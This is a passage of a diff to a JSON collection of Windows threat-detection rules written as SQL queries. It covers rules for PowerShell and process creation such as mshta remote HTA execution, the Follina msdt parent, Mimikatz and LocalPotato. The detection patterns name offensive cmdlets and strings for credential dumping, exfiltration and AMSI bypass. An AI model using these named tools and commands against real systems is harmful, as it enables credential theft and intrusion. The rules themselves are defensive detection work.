ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "status": "experimental", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. 
All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "status": "experimental", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' 
OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": 
"posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "description": "Download or Copy file with Extrac32", "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "Direct Autorun Keys Modification", + "id": "24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, 
Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + 
"title": "Remote Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + }, + { + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_regedit_trustedinstaller.yml" + }, + { + "title": "HackTool - 
PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN 
('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": 
"d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText 